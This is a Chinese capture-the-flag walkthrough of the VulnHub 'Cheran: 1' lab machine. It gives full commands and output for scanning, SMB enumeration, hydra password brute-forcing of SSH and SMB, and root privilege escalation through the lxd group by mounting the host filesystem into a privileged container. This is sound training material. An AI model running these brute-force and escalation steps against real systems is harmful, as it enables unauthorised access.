Cheran EE
靶机信息
名称:Cheran: 1
地址:
https://www.vulnhub.com/entry/cheran-1,521/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:92:75:55 1 60 PCS Systemtechnik GmbH
192.168.56.201 08:00:27:7f:80:62 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192168.56.201
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.201 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 21:49 EST
Nmap scan report for 192.168.56.201
Host is up (0.00012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 38201e427ad6a92a016258f3b637d841 (RSA)
| 256 e8c15a147ac60924b60ac005e48203d9 (ECDSA)
|_ 256 91b9e9b9e7837a287148c4589b397ba1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: A complete list of Chera Rulers and their contribution
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:7F:80:62 (Oracle VirtualBox virtual NIC)
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h50m02s, deviation: 3h10m31s, median: -2s
| smb2-time:
| date: 2023-01-31T02:49:55
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: ubuntu
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: ubuntu
|_ System time: 2023-01-31T08:19:55+05:30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、139/445(SMB)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ smbclient -L 192.168.56.201
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP UBUNTU
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ enum4linux 192.168.56.201
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jan 30 21:51:29 2023
=========================================( Target Information )=========================================
Target ........... 192.168.56.201
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.201 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.56.201 )===============================
Looking up status of 192.168.56.201
UBUNTU <00> - B <ACTIVE> Workstation Service
UBUNTU <03> - B <ACTIVE> Messenger Service
UBUNTU <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 192.168.56.201 )==================================
[+] Server 192.168.56.201 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.56.201 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.56.201 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.56.201 from srvinfo:
UBUNTU Wk Sv PrQ Unx NT SNT ubuntu server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
======================================( Users on 192.168.56.201 )======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
================================( Share Enumeration on 192.168.56.201 )================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP UBUNTU
[+] Attempting to map shares on 192.168.56.201
//192.168.56.201/print$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.56.201/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.56.201 )===========================
[+] Attaching to 192.168.56.201 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] UBUNTU
[+] Builtin
[+] Password Info for Domain: UBUNTU
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.56.201 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.56.201 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-865974611-604371542-2155208271 and logon username '', password ''
S-1-5-21-865974611-604371542-2155208271-501 UBUNTU\nobody (Local User)
S-1-5-21-865974611-604371542-2155208271-513 UBUNTU\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cheran (Local User)
S-1-22-1-1001 Unix User\Rajasimha (Local User)
==============================( Getting printer info for 192.168.56.201 )==============================
No printers returned.
enum4linux complete on Mon Jan 30 21:51:40 2023
对SMB协议的信息收集可知用户名:
cheran
Rajasimha
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/robots.txt
/*
/users
/youtube
访问/users目录:
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/users/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /users</title>
</head>
<body>
<h1>Index of /users</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="Rajasimha.html">Rajasimha.html</a></td><td align="right">2020-07-29 13:02 </td><td align="right">1.0K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="cheran.html">cheran.html</a></td><td align="right">2020-07-29 12:19 </td><td align="right">176 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.201 Port 80</address>
</body></html>
分别访问/users目录下的文件:
http://192.168.56.201/users/cheran.html
将该页面中的图片下载到Kali Linux本地。
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/users/Rajasimha.html
<!DOCTYPE html>
<html>
<head>
<title>Rajasimha</title>
</head>
<body>
Find me...
</body>
</html>
<!--
+++++ +++[- >++++ ++++< ]>+++ .<+++ +++[- >++++ ++<]> +++++ +++.- .----
---.< +++[- >+++< ]>++. <++++ [->-- --<]> -.<++ ++[-> ++++< ]>+++ .-.<+
+++++ ++[-> ----- ---<] >---- ---.< +++[- >---< ]>--- .<+++ +[->- ---<]
>---. ---.+ ++.-- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ .<+++ +[->+
+++<] >++++ .+.<+ ++[-> +++<] >+.<+ +++++ +++[- >---- ----- <]>-- .<+++
+++++ [->++ +++++ +<]>+ +++++ +++.< +++[- >+++< ]>+.< +++++ ++++[ ->---
----- -<]>- -.<++ +++++ ++[-> +++++ ++++< ]>+++ .<+++ [->-- -<]>- --.--
-.<++ +++++ +[->- ----- --<]> ----- .<+++ ++++[ ->+++ ++++< ]>+++ +.<++
+++[- >++++ +<]>+ ++++. <+++[ ->--- <]>-- ---.< +++[- >+++< ]>+++ +.---
-.<++ +[->- --<]> ----. <+++[ ->+++ <]>++ +.--- ----- .<+++ ++++[ ->---
----< ]>--- ---.. .<+++ ++[-> ----- <]>-- ----- -.--- .<
-->
该页面中有一段编码过的信息,将其解码,这是一种brainfuck编码:
用在线网站解码:
https://www.splitbrain.org/services/ook
解码后得到:
Congrats,
This is the Username...
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ ls
Chera-Dynasty.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ steghide extract -sf Chera-Dynasty.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ stegseek Chera-Dynasty.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.48% (132.7 MB)
[!] error: Could not find a valid passphrase.
至此已经知道可能的两个用户名,在尝试破解其密码之前,先做一下目录扫描:
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/youtube/youtube.html
<!DOCTYPE html>
<html>
<title>Youtube</title>
<body>
<h1>Shadow Phreak</h1>
<a href="http://www.youtube.com/c/ShadowPhreak">Visit Shadow Phreak Youtube Channel</a>
<p>
<ul>
<li> <a href="https://youtu.be/MvEGnf4CvMk">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/f897aE9V3BI">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/idyEEb7BDLw">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/N_MIArVvZpE">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/chSu9PcXNhI">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/hmWjRM9dViQ">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/jQqbhtw7Faw">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/YnTDqNcbib0">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/_V0QxKe5ufc">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/VLCDnSQf4Vg">Please Subscribe</a> </li>
</ul>
</p>
</body>
<footer>
<p> Author : Mr. S. Premkumar </p>
</footer>
</html>
<!-- U0dsa1pHVnVJRWx1Wm04PQ== -->
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ echo 'U0dsa1pHVnVJRWx1Wm04PQ==' | base64 -d
SGlkZGVuIEluZm8=
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ echo 'U0dsa1pHVnVJRWx1Wm04PQ==' | base64 -d | base64 -d
Hidden Info
Hidden Info不知道什么意思?先暂时放一放?
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/admin.php
<!DOCTYPE html>
<html>
<body>
<?php
echo "The way you are going is wrong...";
?>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ gobuster dir -u http://192.168.56.201 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.201
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/01/30 22:11:38 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.201/images/]
/index.html (Status: 200) [Size: 21614]
/.html (Status: 403) [Size: 279]
/users (Status: 301) [Size: 316] [--> http://192.168.56.201/users/]
/admin.php (Status: 200) [Size: 100]
/robots.txt (Status: 200) [Size: 21]
/youtube (Status: 301) [Size: 318] [--> http://192.168.56.201/youtube/]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101025 / 1102805 (99.84%)===============================================================
2023/01/30 22:13:36 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l Rajasimha -P /usr/share/wordlists/rockyou.txt smb://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:49:39
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.201:445/
[445][smb] Host: 192.168.56.201 Account: Rajasimha Error: Invalid account (Anonymous success)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 22:49:51
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l cheran -P /usr/share/wordlists/rockyou.txt smb://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:50:11
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.201:445/
[445][smb] Host: 192.168.56.201 Account: cheran Error: Invalid account (Anonymous success)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 22:50:13
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l Rajasimha -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:15:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.201:22/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 14344245 to do in 1532:31h, 14 active
[STATUS] 117.00 tries/min, 351 tries in 00:03h, 14344050 to do in 2043:19h, 14 active
[STATUS] 102.29 tries/min, 716 tries in 00:07h, 14343685 to do in 2337:12h, 14 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l rajasimha -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:30:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.201:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[STATUS] 113.67 tries/min, 341 tries in 00:03h, 14344061 to do in 2103:15h, 13 active
[STATUS] 95.14 tries/min, 666 tries in 00:07h, 14343736 to do in 2512:40h, 13 active
[STATUS] 96.33 tries/min, 1445 tries in 00:15h, 14342957 to do in 2481:29h, 13 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l cheran -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:47:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.201:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[STATUS] 124.67 tries/min, 374 tries in 00:03h, 14344026 to do in 1917:40h, 15 active
[STATUS] 109.43 tries/min, 766 tries in 00:07h, 14343634 to do in 2184:38h, 15 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
一直没有破解成功密码。
看了其他人的做法,这是因为我将目标主机设为Host-only, 在/youtube目录下有若干链接,其中一个链接为密码:k4rur,而用户名是所猜测的用户名:Rajasimha.
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ ssh [email protected]
The authenticity of host '192.168.56.201 (192.168.56.201)' can't be established.
ED25519 key fingerprint is SHA256:bIEC4Rwz61rgp7mqsqUIOiHq+JZ68ACsyG6CaAakEaU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.201' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jan 31 09:28:00 IST 2023
System load: 0.01 Processes: 96
Usage of /: 27.1% of 9.78GB Users logged in: 0
Memory usage: 54% IP address for enp0s3: 192.168.56.201
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9
Rajasimha@ubuntu:~$ id
uid=1001(Rajasimha) gid=1001(Rajasimha) groups=1001(Rajasimha)
Rajasimha@ubuntu:~$
Rajasimha@ubuntu:/tmp$ sudo -l
Matching Defaults entries for Rajasimha on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User Rajasimha may run the following commands on ubuntu:
(ALL, !root) /bin/bash
虽然可以执行/bin/bash命令提权,但是无法提权到root,可以提权到另一个用户cheran
Rajasimha@ubuntu:/tmp$ sudo -u cheran /bin/bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
cheran@ubuntu:/tmp$ id
uid=1000(cheran) gid=1000(cheran) groups=1000(cheran),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),115(sambashare),116(lpadmin)
cheran@ubuntu:/tmp$ sudo -l
[sudo] password for cheran:
Sorry, try again.
[sudo] password for cheran:
Sorry, try again.
[sudo] password for cheran:
sudo: 3 incorrect password attempts
cheran@ubuntu:/tmp$ cd /home/cheran/
cheran@ubuntu:/home/cheran$ ls -alh
total 28K
drwxr-xr-x 4 cheran cheran 4.0K Jul 29 2020 .
drwxr-xr-x 4 root root 4.0K Jul 29 2020 ..
-rw-r--r-- 1 cheran cheran 220 Jul 29 2020 .bash_logout
-rw-r--r-- 1 cheran cheran 3.7K Jul 29 2020 .bashrc
drwx------ 2 cheran cheran 4.0K Jul 29 2020 .cache
drwx------ 3 cheran cheran 4.0K Jul 29 2020 .gnupg
-rw-r--r-- 1 cheran cheran 807 Jul 29 2020 .profile
-rw-r--r-- 1 cheran cheran 0 Jul 29 2020 .sudo_as_admin_successful
cheran@ubuntu:/home/cheran$
cheran@ubuntu:/home/cheran$
cheran是lxd的用户组成员,是否可以利用lxd进行提权
但是利用lxd提权的时候发现报错:
cheran@ubuntu:/tmp$ lxc image import ./alpine.tar.gz --alias myimage
Error: Unable to read the configuration file: open /home/Rajasimha/.config/lxc/config.yml: permission denied
非常奇怪的错误,其实前面在sudo 的时候需要加上-i选项即可解决该错误:
Rajasimha@ubuntu:/tmp$ sudo -i -u cheran /bin/bash
[sudo] password for Rajasimha:
cheran@ubuntu:~$ cd /tmp
cheran@ubuntu:/tmp$ ls
alpine.tar.gz
alpine-v3.13-x86_64-20210218_0139.tar.gz
linpeas.sh
systemd-private-134633a4e12d40a984cc125c2c3816d4-apache2.service-Ui2U0g
systemd-private-134633a4e12d40a984cc125c2c3816d4-systemd-resolved.service-X2Iddq
systemd-private-134633a4e12d40a984cc125c2c3816d4-systemd-timesyncd.service-AM7InD
tmux-1001
cheran@ubuntu:/tmp$ lxc import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Error: unknown command "import" for "lxc"
Run 'lxc --help' for usage.
cheran@ubuntu:/tmp$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:18.04
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
cheran@ubuntu:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Jan 31, 2023 at 4:30am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
cheran@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
cheran@ubuntu:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
cheran@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
cheran@ubuntu:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
cheran@ubuntu:/tmp$ lxc start ignite
cheran@ubuntu:/tmp$ lxc exec ignite /bin/sh
~ # cd /mnt/root
/mnt/root # ls -alh
total 473M
drwxr-xr-x 23 root root 4.0K Jul 29 2020 .
drwxr-xr-x 1 root root 8 Jan 31 04:32 ..
drwxr-xr-x 2 root root 4.0K Jul 29 2020 bin
drwxr-xr-x 3 root root 4.0K Jul 29 2020 boot
drwxr-xr-x 18 root root 3.8K Jan 31 02:46 dev
drwxr-xr-x 98 root root 4.0K Jan 31 02:47 etc
drwxr-xr-x 4 root root 4.0K Jul 29 2020 home
lrwxrwxrwx 1 root root 34 Jul 29 2020 initrd.img -> boot/initrd.img-4.15.0-112-generic
lrwxrwxrwx 1 root root 34 Jul 29 2020 initrd.img.old -> boot/initrd.img-4.15.0-112-generic
drwxr-xr-x 22 root root 4.0K Jul 29 2020 lib
drwxr-xr-x 2 root root 4.0K Jul 29 2020 lib64
drwx------ 2 root root 16.0K Jul 29 2020 lost+found
drwxr-xr-x 2 root root 4.0K Jul 29 2020 media
drwxr-xr-x 2 root root 4.0K Jul 29 2020 mnt
drwxr-xr-x 2 root root 4.0K Jul 29 2020 opt
dr-xr-xr-x 143 root root 0 Jan 31 02:46 proc
drwx------ 3 root root 4.0K Jul 29 2020 root
drwxr-xr-x 27 root root 940 Jan 31 04:31 run
drwxr-xr-x 2 root root 12.0K Jul 29 2020 sbin
drwxr-xr-x 2 root root 4.0K Jul 29 2020 snap
drwxr-xr-x 2 root root 4.0K Jul 29 2020 srv
-rw------- 1 root root 472.5M Jul 29 2020 swapfile
dr-xr-xr-x 13 root root 0 Jan 31 02:46 sys
drwxrwxrwt 11 root root 4.0K Jan 31 04:30 tmp
drwxr-xr-x 10 root root 4.0K Jul 29 2020 usr
drwxr-xr-x 14 root root 4.0K Jul 29 2020 var
lrwxrwxrwx 1 root root 31 Jul 29 2020 vmlinuz -> boot/vmlinuz-4.15.0-112-generic
lrwxrwxrwx 1 root root 31 Jul 29 2020 vmlinuz.old -> boot/vmlinuz-4.15.0-112-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 28K
drwx------ 3 root root 4.0K Jul 29 2020 .
drwxr-xr-x 23 root root 4.0K Jul 29 2020 ..
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Jul 29 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 849 Jul 29 2020 .viminfo
-rw-r--r-- 1 root 1001 2.2K Jul 29 2020 root.txt
/mnt/root/root # cat root.txt
Bow & Arrow (/,**
%%/ /***********/(.Cheran Flag.)/*******////*/*
/(,, /*****/((((//******/ //
/(, .,, /(
/(, */, /
(#, , ,,, ./
(# , ,,, //
(# .. ,,, /(
## .(,,,,,,,,,,,,,,, /,
## * ,, *.
## , ,, *
## * .,,, /*
## **, /*
#% ,, *****
#% **, .*****************,
#%*.
%% Congrats...
##
##
#( Here is the Flag...
#*
.#*
.(* Share your screenshot in telegram : https://t.me/joinchat/N06BGRSyCLUnOBsONd9fxg
*
/mnt/root/root #
导致开始的时候利用lxc提权失败,主要原因是sudo 切换用户的时候没有加上-i选项
┌──(kali㉿kali)-[~/Toolsets]
└─$ man sudo | grep -e '-i'
[-T timeout] [-u user] [VAR=value] [-i | -s] [command]
-i, --login
manual documents how the -i option affects the environment in which a command is run when the sudoers
-n, --non-interactive
MAIL Set to the mail spool of the target user when the -i option is specified, or when env_reset is en‐
HOME Set to the home directory of the target user when the -i or -H options are specified, when the -s
LOGNAME Set to the login name of the target user when the -i option is specified, when the set_logname op‐
┌──(kali㉿kali)-[~/Toolsets]
└─$
经验教训
-
由于靶机网络模式设置为host-only,导致作者设置的关键线索无法得到(需要联网)
-
sudo切换用户的时候可能需要加上-i选项,即login,这样才能得到一些环境变量